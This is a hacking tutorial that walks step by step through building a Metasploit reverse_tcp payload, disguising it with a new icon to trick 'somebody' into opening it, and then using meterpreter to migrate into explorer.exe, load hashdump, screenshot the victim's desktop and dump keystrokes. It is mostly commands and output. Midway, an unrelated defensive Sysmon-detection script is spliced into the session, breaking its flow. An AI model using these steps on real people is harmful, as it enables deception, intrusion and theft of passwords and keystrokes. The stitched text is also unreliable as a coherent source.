Download Metasploit from http://www.metasploit.com/download/; you can use it on Windows or Linux.
Install the program.
If it is only on your local network, use your local IP address; if it is over the internet, use your WAN IP address, which you can see at http://www.whatismyip.com/
Start a terminal/shell on BackTrack.
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.113.201.34 LPORT=4444 x > /root/Payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=10.113.201.34,LPORT=4444
root@bt:~#

If you made the payload right, the output will look like this; if it doesn't, you did something wrong. The Payload.exe file (written to /root/Payload.exe by the command above) will be on your desktop.
I suggest, if you can, downloading Icon Changer 3.8 and changing the icon and renaming it to something more interesting; then you can easily get somebody to open the file.
Download Icon Changer 3.8 here: http://www.shelllabs...er_download.htm
Start Metasploit and choose your exploit and PAYLOAD, as shown below.
root@bt:~# msfconsole

                 ____________
                < metasploit >
                 ------------
                       \   ,__,
                        \  (oo)____
                           (__)    )\
                              ||--|| *

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9959 updated 241 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 241 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) >

See which options you have.
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

We are going to use our local IP address this time. Find it by opening a new terminal/shell.
root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:32:56:46
          inet addr:10.113.201.34  Bcast:10.113.201.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:43 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:5370 (5.3 KB)  TX bytes:1152 (1.1 KB)
          Interrupt:19 Base address:0x2000

Now let's set our IP and port. Go back to Metasploit.
msf exploit(handler) > set LHOST 10.113.201.34
LHOST => 10.113.201.34
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...

Get someone to open Payload.exe. I recommend downloading Icon Changer 3.8, changing the Payload.exe icon and renaming it, and then sending it to somebody. After they open the file it will look like this.
[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 10.113.201.59
[*] Meterpreter session 1 opened (10.113.201.34:4444 -> 10.113.201.59:7293) at 2011-04-03 22:44:14 -0200

meterpreter >

We are going to migrate into explorer.exe now. Type ps to see the target's processes.
meterpreter > ps

Process list
============

 PID   Name                          Arch  Session  User             Path
 ---   ----                          ----  -------  ----             ----
 0     [System Process]
 4     System
 356   smss.exe
 444   csrss.exe
 508   wininit.exe
 520   csrss.exe
 556   services.exe
 572   lsass.exe
 580   lsm.exe
 704   svchost.exe
 768   nvvsvc.exe
 808   svchost.exe
 868   svchost.exe
 900   svchost.exe
 928   svchost.exe
 1068  svchost.exe
 1144  DisplayLinkManager.exe
 1176  winlogon.exe
 1316  Smc.exe
 1400  nvvsvc.exe
 1476  svchost.exe
 1548  ccSvcHst.exe
 1708  spoolsv.exe
 1720  DisplayLinkUserAgent.exe
 1752  svchost.exe
 1992  svchost.exe
 2040  IPROSetMonitor.exe
 464   LVPrcSrv.exe
 408   mdm.exe
 940   svchost.exe
 1140  Rtvscan.exe
 1448  TeamViewer_Service.exe
 2068  UltiDevCassinWebServer2a.exe
 2144  vmware-usbarbitrator.exe
 2268  vmnat.exe
 2324  vmnetdhcp.exe
 2360  vmware-authd.exe
 2848  svchost.exe
 2916  svchost.exe
 3460  taskhost.exe                  x86   1        SERMERSOOQ\ilin  C:\Windows\system32\taskhost.exe
 3528  dwm.exe                       x86   1        SERMERSOOQ\ilin  C:\Windows\system32\Dwm.exe
 3580  explorer.exe                  x86   1        SERMERSOOQ\ilin  C:\Windows\Explorer.EXE
 3740  DisplayLinkUI.exe             x86   1        SERMERSOOQ\ilin  C:\Program Files\DisplayLink Core Software\DisplayLinkUI.exe
 4080  hqtray.exe                    x86   1        SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\hqtray.exe
 2304  SmcGui.exe                    x86   1
 2084  AdobeARM.exe                  x86   1        SERMERSOOQ\ilin  C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
 2336  ccApp.exe                     x86   1        SERMERSOOQ\ilin  C:\Program Files\Common Files\Symantec Shared\ccApp.exe
 2000  LWS.exe                       x86   1        SERMERSOOQ\ilin  C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
 3832  PWRISOVM.EXE                  x86   1        SERMERSOOQ\ilin  C:\Program Files\PowerISO\PWRISOVM.EXE
 4004  PrintScreen.exe               x86   1        SERMERSOOQ\ilin  C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
 1952  PRTG Windows GUI.exe          x86   1        SERMERSOOQ\ilin  C:\Program Files\PRTG Network Monitor\PRTG Windows GUI.exe
 1936  CUCore.exe                    x86   1        SERMERSOOQ\ilin  C:\Users\ilin\AppData\Local\Radvision\Conference Client\7.10.1.169\cucore.exe
 2540  COCIManager.exe               x86   1        SERMERSOOQ\ilin  C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe
 4784  SearchIndexer.exe
 2964  msnmsgr.exe                   x86   1        SERMERSOOQ\ilin  C:\Program Files\Windows Live\Messenger\msnmsgr.exe
 6028  wlcomm.exe                    x86   1        SERMERSOOQ\ilin  C:\Program Files\Windows Live\Contacts\wlcomm.exe
 5944  vmplayer.exe                  x86   1        SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\vmplayer.exe
 5096  firefox.exe                   x86   1        SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\firefox.exe
 448   plugin-container.exe          x86   1        SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\plugin-container.exe
 4488  vmware-vmx.exe
 5200  Payload.exe                   x86   1        SERMERSOOQ\ilin  C:\Users\ilin\Desktop\Payload.exe
 5696  notepad.exe                   x86   1        SERMERSOOQ\ilin  C:\Windows\system32\notepad.exe

The process we want is explorer.exe (PID 3580).

meterpreter > migrate 3580
[*] Migrating to 3580...
[*] Migration completed successfully.
meterpreter >

I typed use priv to open hashdump and other things.
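From the defender's side, the session above leaves two host-level traces: an executable launched from the user's Desktop opens an outbound TCP connection to an unusual port (the reverse_tcp stage, the "Sending stage" and "session opened" lines), and that same process then creates a thread inside explorer.exe (the migrate step). The following detection logic is an added example written for this page, not part of the tutorial or of Metasploit. It runs over constructed event records whose field names are modelled on Sysmon Event ID 3 (NetworkConnect) and Event ID 8 (CreateRemoteThread); the sample paths, ports and addresses are taken from or patterned after the session shown above and are not a real capture.

```python
"""Flag the two behaviours the session above exhibits on the victim host:
 1. a binary in a user-writable path opening an outbound connection to a
    port outside the expected set (the reverse_tcp stage), and
 2. that binary creating a remote thread in a sensitive system process
    (meterpreter's migrate into explorer.exe).
Events are constructed sample data modelled on Sysmon EID 3 and EID 8."""

import ipaddress

# Constructed sample events; field names assume Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Initiated": True},
    {"EventID": 3, "Image": r"C:\Users\ilin\Desktop\Payload.exe",
     "DestinationIp": "10.113.201.34", "DestinationPort": 4444, "Initiated": True},
    {"EventID": 8, "SourceImage": r"C:\Users\ilin\Desktop\Payload.exe",
     "TargetImage": r"C:\Windows\Explorer.EXE", "StartAddress": "0x00ABCDEF"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "StartAddress": "0x77A0B123"},
]

# Locations a standard user can write to; a fresh binary here is not trusted.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Long-lived processes that implants like to migrate into.
SENSITIVE_TARGETS = ("explorer.exe", "lsass.exe", "svchost.exe", "winlogon.exe")
# Ports ordinary desktop software is expected to talk to (assumed baseline).
EXPECTED_PORTS = {80, 443, 53, 25, 587, 993, 995}


def from_user_writable_path(image):
    return image.lower().startswith(USER_WRITABLE_PREFIXES)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_connection(ev):
    """Outbound connection from a user-path binary to a non-baseline port.
    A private destination (10.x) does not clear it: the session above was
    staged entirely on a LAN."""
    if ev.get("EventID") != 3 or not ev.get("Initiated"):
        return None
    if not from_user_writable_path(ev["Image"]):
        return None
    if ev["DestinationPort"] in EXPECTED_PORTS:
        return None
    scope = "private" if ipaddress.ip_address(ev["DestinationIp"]).is_private else "public"
    return f"outbound {ev['Image']} -> {ev['DestinationIp']}:{ev['DestinationPort']} ({scope} address)"


def suspicious_remote_thread(ev):
    """A user-path process starting a thread in a sensitive system process
    is the host-side signature of a migrate."""
    if ev.get("EventID") != 8:
        return None
    if not from_user_writable_path(ev["SourceImage"]):
        return None
    if basename(ev["TargetImage"]) not in SENSITIVE_TARGETS:
        return None
    return f"remote thread {ev['SourceImage']} -> {ev['TargetImage']}"


def correlate(events):
    """Return (severity, message) alerts in event order; a process that has
    already beaconed and then injects is escalated to high."""
    alerts, beaconing = [], set()
    for ev in events:
        msg = suspicious_connection(ev)
        if msg:
            beaconing.add(ev["Image"].lower())
            alerts.append(("medium", msg))
        msg = suspicious_remote_thread(ev)
        if msg:
            sev = "high" if ev["SourceImage"].lower() in beaconing else "medium"
            alerts.append((sev, msg))
    return alerts


if __name__ == "__main__":
    for sev, msg in correlate(SAMPLE_EVENTS):
        print(f"[{sev}] {msg}")
```

Run on the constructed events, the Firefox connection on 443 and the csrss.exe thread into notepad.exe are ignored, Payload.exe's connection to port 4444 is reported at medium severity, and its thread into Explorer.EXE is escalated to high because the same image had already beaconed. In a real deployment the port baseline and path prefixes would come from the environment's own telemetry rather than the constants assumed here.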
meterpreter > use priv
Loading extension priv...success.

Type sysinfo to see which system it is. Is it helpful?
meterpreter > sysinfo
Computer: NUUMOB0088
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: da_DK
meterpreter >

Take a screenshot of the target's desktop; remember that after you take the screenshot, the file is on your desktop.
meterpreter > screenshot
Screenshot saved to: /root/qgYuVeTx.jpeg
meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner-1.9.0.15/libxul.so: undefined symbol: sqlite3_enable_shared_cache
meterpreter >

You can capture whatever the target types with this.
meterpreter > keyscan_dump
Dumping captured keystrokes...
<LWin> rnotepad <Return> my password it Hahahahaha <Alt> <LMenu> <Tab>
meterpreter >

If you don't want to wait for the host, you can just type the target's IP and port. My tutorial link is here: https://www.nulledbl...ith-metasploit/